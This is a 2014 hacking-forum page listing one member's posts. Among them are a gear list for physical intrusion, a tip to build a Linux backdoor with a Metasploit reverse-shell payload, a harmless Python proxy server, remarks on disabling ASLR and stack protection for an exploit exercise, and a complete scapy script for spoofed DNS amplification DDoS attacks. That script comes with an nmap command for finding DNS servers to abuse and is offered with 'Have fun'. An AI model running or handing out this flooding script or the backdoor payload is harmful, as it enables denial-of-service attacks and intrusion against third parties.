Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - Fl0urite

Pages: [1]
1
Hacking and Security / Re: My all kit.
« on: March 04, 2014, 05:35:33 am »
Hacking kit could resemble the following:

-lockpicks and the knowledge to use them
-laptop w/ wireless adapter that supports monitor/injection
-usb w/ Kali
-usb for storage
-Ethernet cable (never know when you're going to need to hardware in to get on a network)
-multi-tool w/ knife, pliers, scissors, etc
-wire/cable
-flashlight (can be effective on camera systems with ir w/o motion alarms, as well as able to see in the dark)
-portable power
-tape

I can't think of anything else off the top of my head. So what are we breaking into?
Fort Knox.

2
Hacking and Security / Re: Linux RAT
« on: March 03, 2014, 08:52:36 am »
Try using metasploit to create a backdoor
 http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Backdoor
just use payload/linux/x86/meterpreter/reverse_tcp :P

3
Scripting Languages / [PYTHON] Proxy Server 19 Lines of Code!
« on: February 28, 2014, 01:47:29 am »
19 lines of code for a proxy server (that works amazingly too!)
It works for HTTP, and HTTPS!
Maybe it works for a few other things?
made by yours truly!
Code: [Select]

import socket
import urllib2
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('',8080))
s.listen(1000)
def HandleProxy(c):
   Request=c.recv(1024)
   Parse=Request.split()
   try:
      req = urllib2.Request(Parse[1])
      html=urllib2.urlopen(req).read()
   except (urllib2.URLError,urllib2.HTTPError) as e:
      html="<b>Proxy error: "+e.reason[1]+"</b>"
   c.send(html)
   print "Requested data:\n"+ Request
while 1:
      (c,addr)=s.accept()
      print addr[0]+":"+str(addr[1])+" connected!"
      HandleProxy(c)


For those of you who want a multi-threaded version here you go (not 19 lines lol):
Code: [Select]

#Simple python base proxy server
#coded by fl0urite!
from threading import Thread
import socket
import urllib2
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('',8080))
s.listen(1000)
def HandleProxy(c):
   Request=c.recv(1024)
   Parse=Request.split()
   try:
      req = urllib2.Request(Parse[1])
      html=urllib2.urlopen(req).read()
   except (urllib2.URLError,urllib2.HTTPError) as e:
      html="<b>Proxy error: "+e.reason[1]+"</b>"
   c.send(html)
   print "Requested data:\n"+ Request
while 1:
   (c,addr)=s.accept()
   print addr[0]+":"+str(addr[1])+" connected!"
   thread = Thread(target=HandleProxy(c))
   thread.start()


Have fun!

Staff note: edit button. Do you use it?
Fl0urite's reply: On this forum it is the modify button, so no.

4
Tutorials / Re: Easy intro to (local) exploitation
« on: February 26, 2014, 01:41:37 am »
I think the more logical way to circumvent this difference, for this tutorial, would be to 'gcc -m32' :D
Since..this
echo 0 > /proc/sys/kernel/randomize_va_space
sounds like a setting being set for this specific example file
and
gcc -fno-stack-protector -z execstack
hmm... sounds too easy to just disable the stack-protector :D


By the way, from this example it seems to me that 64bit programs do have a stack protector while 32bit ones do not? This sounds weird, so I ask you. I sorta intend to know what's happening, in addition to learn commands.
Thanks!
linux is very secure, it has many functions in the kernel to prevent many different kinds of exploits, most exploits don't require special conditions to work on windows.

5
Scripting Languages / Python DNS Amplification Attack
« on: February 25, 2014, 06:07:28 am »
I am not responsible for any damages this script causes.


anyway here is the code :P
View from mediafire: http://www.mediafire.com/view/bihw74wedccjaz7/dnsamp.py
Code: [Select]
from scapy.all import *
import sys
from random import randrange
try:
    TARGET=sys.argv[1]
    AMP_LIST=sys.argv[2]
except:
    print "Usage: ./"+__file__+" [TARGET] [AMP LIST]"
    exit(1)
print "[+] Attacking "+TARGET+"..."
print
while 1:
    with open(AMP_LIST,"r") as f:
        for SERVER in f:
            SERVER=SERVER.replace("\n","")
            try:
                send(IP(dst=SERVER, src=TARGET)/UDP(dport=53, sport=randrange(1024,65535))/DNS(qd=DNSQR(qname="goo.gl", qtype="TXT")),verbose=0)
                print "[+] Sent spoofed DNS request to: "+SERVER
            except:
                print "[-] Could not send spoofed DNS request to "+SERVER+" (is the server online?)"
scan for live DNS servers:

nmap -iR 10000 -Pn -p 53

sorry for not having an advanced arg parsing :C
Have fun guiz!

6
Hacking and Security / Re: DNS Amplification Maybe?
« on: February 25, 2014, 05:46:50 am »
Ok, so some of you have heard about my recent experience with a Nigerian 419er and how he's been unsuccessfully DDoSing me for literally days(I turned off my firewall for a second to see that he's surely still goin at it).

Then today suddenly my internet went out again. I noticed in wireshark that I was receiving absolutely nothing but outbound DNS requests to two different IP's, but many different name servers. After some basic network troubleshooting and about 1000 more DNS requests, all outbound, I started thinking that this was a DNS amplification attack. Seems there isn't much one can do about such attacks. At least, according to le interweb. I tried a couple different iptables rules to no avail. I don't understand DNS amplification as well as I should, but I guess iptables doesn't do much against this.

Anyway, after some time of almost calling it quits because I was tired and feeling stupid, I went it to my router to poke around. I noticed that in the settings I had it set to a static DNS address. All I did was switch that to get dynamically from ISP, as well as my IP address, and suddenly everything went back to normal. Does this make sense?
Yes it does, your ISP has a DNS pointer to your IP that looks sort of like this:
Code: [Select]
insertrandomshithere.cg.shawcable.net
Your attacker was attacking this DNS pointer (which was dumb) with a dns amplification attack

Pages: [1]